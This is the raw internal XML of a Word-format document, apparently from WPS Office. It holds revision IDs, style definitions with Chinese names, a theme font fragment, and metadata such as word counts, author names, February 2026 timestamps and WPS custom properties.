    <w:rsid w:val="0019658A"/>
    <w:rsid w:val="001D1375"/>
    <w:rsid w:val="001E148A"/>
    <w:rsid w:val="00260430"/>
    <w:rsid w:val="00287B24"/>
    <w:rsid w:val="002A28FF"/>
    <w:rsid w:val="003004F0"/>
    <w:rsid w:val="00310509"/>
    <w:rsid w:val="00336E06"/>
    <w:rsid w:val="00362FC2"/>
    <w:rsid w:val="0037739E"/>
    <w:rsid w:val="00383057"/>
    <w:rsid w:val="003A472D"/>
    <w:rsid w:val="003D351A"/>
    <w:rsid w:val="003D5BA5"/>
    <w:rsid w:val="003E5C19"/>
    <w:rsid w:val="004559C1"/>
    <w:rsid w:val="00462FE5"/>
    <w:rsid w:val="00491028"/>
    <w:rsid w:val="005933FB"/>
    <w:rsid w:val="005D4674"/>
    <w:rsid w:val="00631714"/>
    <w:rsid w:val="006328E8"/>
    <w:rsid w:val="00662201"/>
    <w:rsid w:val="00692F2F"/>
    <w:rsid w:val="00706B4F"/>
    <w:rsid w:val="00753B83"/>
    <w:rsid w:val="00763D9C"/>
    <w:rsid w:val="00785E8C"/>
    <w:rsid w:val="007C6585"/>
    <w:rsid w:val="008273B0"/>
    <w:rsid w:val="00870620"/>
    <w:rsid w:val="008C0FC0"/>
    <w:rsid w:val="00945605"/>
    <w:rsid w:val="00982426"/>
    <w:rsid w:val="009A71B9"/>
    <w:rsid w:val="009B7BC2"/>
    <w:rsid w:val="009C0646"/>
    <w:rsid w:val="009F39E9"/>
    <w:rsid w:val="009F3D4B"/>
    <w:rsid w:val="00A61082"/>
    <w:rsid w:val="00B000E3"/>
    <w:rsid w:val="00B335B5"/>
    <w:rsid w:val="00B416C5"/>
    <w:rsid w:val="00B7641B"/>
    <w:rsid w:val="00B868C7"/>
    <w:rsid w:val="00B87099"/>
    <w:rsid w:val="00C867F5"/>
    <w:rsid w:val="00C9632B"/>
    <w:rsid w:val="00CC0826"/>
    <w:rsid w:val="00D00207"/>
    <w:rsid w:val="00D1274A"/>
    <w:rsid w:val="00D254E3"/>
    <w:rsid w:val="00D33430"/>
    <w:rsid w:val="00D35D6D"/>
    <w:rsid w:val="00D36EF9"/>
    <w:rsid w:val="00D7392B"/>
    <w:rsid w:val="00DB22D2"/>
    <w:rsid w:val="00E30E66"/>
    <w:rsid w:val="00E3666D"/>
    <w:rsid w:val="00EF73A3"/>
    <w:rsid w:val="00F703C8"/>
    <w:rsid w:val="00FA2252"/>
    <w:rsid w:val="00FB45BB"/>
    <w:rsid w:val="00FD777E"/>
    <w:rsid w:val="00FE76E7"/>
    <w:rsid w:val="00FF084F"/>
    <w:rsid w:val="070E48A8"/>
    <w:rsid w:val="0C27068D"/>
    <w:rsid w:val="0E963B01"/>
    <w:rsid w:val="0EF12AE6"/>
    <w:rsid w:val="13461FD7"/>
    <w:rsid w:val="15E218CE"/>
    <w:rsid w:val="17944956"/>
    <w:rsid w:val="1C9A2A0F"/>
    <w:rsid w:val="243674C1"/>
    <w:rsid w:val="24442987"/>
    <w:rsid w:val="261D2B69"/>
    <w:rsid w:val="2630419C"/>
    <w:rsid w:val="2B035C23"/>
    <w:rsid w:val="2DB65F74"/>
    <w:rsid w:val="338673F1"/>
    <w:rsid w:val="339A2E9C"/>
    <w:rsid w:val="36A4475E"/>
    <w:rsid w:val="37841E99"/>
    <w:rsid w:val="38F90665"/>
    <w:rsid w:val="3F13479C"/>
    <w:rsid w:val="3F4C624D"/>
    <w:rsid w:val="40C81049"/>
    <w:rsid w:val="43896235"/>
    <w:rsid w:val="47631E5E"/>
    <w:rsid w:val="4A2819C9"/>
    <w:rsid w:val="4E660AF6"/>
    <w:rsid w:val="51A0391C"/>
    <w:rsid w:val="52407694"/>
    <w:rsid w:val="5479292E"/>
    <w:rsid w:val="558A6E6B"/>
    <w:rsid w:val="559648DA"/>
    <w:rsid w:val="567C6706"/>
    <w:rsid w:val="5B082187"/>
    <w:rsid w:val="5D496D49"/>
    <w:rsid w:val="5DFC2AD9"/>
    <w:rsid w:val="5DFC59C2"/>
    <w:rsid w:val="5E6A153A"/>
    <w:rsid w:val="5FBE7D8F"/>
    <w:rsid w:val="6408782B"/>
    <w:rsid w:val="642F3141"/>
    <w:rsid w:val="692D1AE1"/>
    <w:rsid w:val="697415F1"/>
    <w:rsid w:val="6E970129"/>
    <w:rsid w:val="70424037"/>
    <w:rsid w:val="705043C4"/>
    <w:rsid w:val="71DF4259"/>
    <w:rsid w:val="78CC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76" w:lineRule="auto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Arial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customStyle="1" w:styleId="11">
    <w:name w:val="mobile"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:shd w:val="clear" w:fill="D7D7D7" w:themeFill="background1" w:themeFillShade="D8"/>
      <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12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sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="14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customStyle="1" w:styleId="15">
    <w:name w:val="索引"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="16">
    <w:name w:val="页眉与页脚"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="17">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="18">
    <w:name w:val="表格内容"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0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</a:majorFont>
      <a:minorFont>
        <a:latin typeface="等线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348</Words>
  <Characters>1289</Characters>
  <Lines>9</Lines>
  <Paragraphs>2</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1329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2026-02-03T08:16:00Z</dcterms:created>
  <dc:creator>Chen</dc:creator>
  <cp:lastModifiedBy>Paranoid</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-13T08:58:32Z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eyJoZGlkIjoiZTM2MTJkMjAxNTFhNDJlNmZlMTVkZDUxYTUzM2Y0ZjAiLCJ1c2VySWQiOiIxMjMyNDA0ODA4In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.24657</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>50BC74B20F96464D935206BEA7B13428_12</vt:lpwstr>
  </property>
</Properties>
</file>